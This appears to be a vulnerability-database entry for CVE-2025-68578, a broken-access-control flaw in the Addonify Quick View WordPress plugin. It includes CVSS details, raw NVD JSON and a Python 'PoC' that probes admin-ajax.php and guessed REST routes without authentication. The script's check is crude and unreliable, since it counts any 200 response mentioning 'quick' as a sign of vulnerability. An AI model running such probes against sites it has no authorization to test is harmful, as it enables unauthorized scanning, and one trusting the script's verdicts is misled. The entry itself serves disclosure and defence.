Security Vulnerability Report
中文
CVE-2025-68578 CVSS 5.3 MEDIUM

CVE-2025-68578

Published: 2025-12-24 13:16:25
Last Modified: 2026-04-27 19:16:33

Description

Missing Authorization vulnerability in Addonify Addonify addonify-quick-view allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify: from n/a through <= 2.0.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Addonify Quick View WordPress插件所有版本 <= 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68578 PoC - Addonify Quick View Missing Authorization # This PoC demonstrates the broken access control vulnerability # Note: Use only for authorized security testing import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-68578 """ # Common addonify-quick-view endpoints that may lack authorization vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/addonify-quick-view/v1/", "/?rest_route=/addonify-quick-view/v1/" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/json' } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-68578 - Addonify Quick View Broken Access Control\n") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Test for unauthorized access response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[!] Potential vulnerable endpoint found: {url}") print(f" Status Code: {response.status_code}") print(f" Response Length: {len(response.text)} bytes") if 'addonify' in response.text.lower() or 'quick' in response.text.lower(): print(f" [+] Likely vulnerable - contains addonify references") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint requires authentication: {url}") else: print(f"[-] Endpoint returned status {response.status_code}: {url}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") print("\n[*] Testing complete. If vulnerable endpoints were found,") print("[*] please verify manually and apply security updates.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68578-poc.py <target_url>") print("Example: python cve-2025-68578-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68578", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:24.893", "lastModified": "2026-04-27T19:16:32.780", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Addonify Addonify addonify-quick-view allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Addonify: from n/a through <= 2.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/addonify-quick-view/vulnerability/wordpress-addonify-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}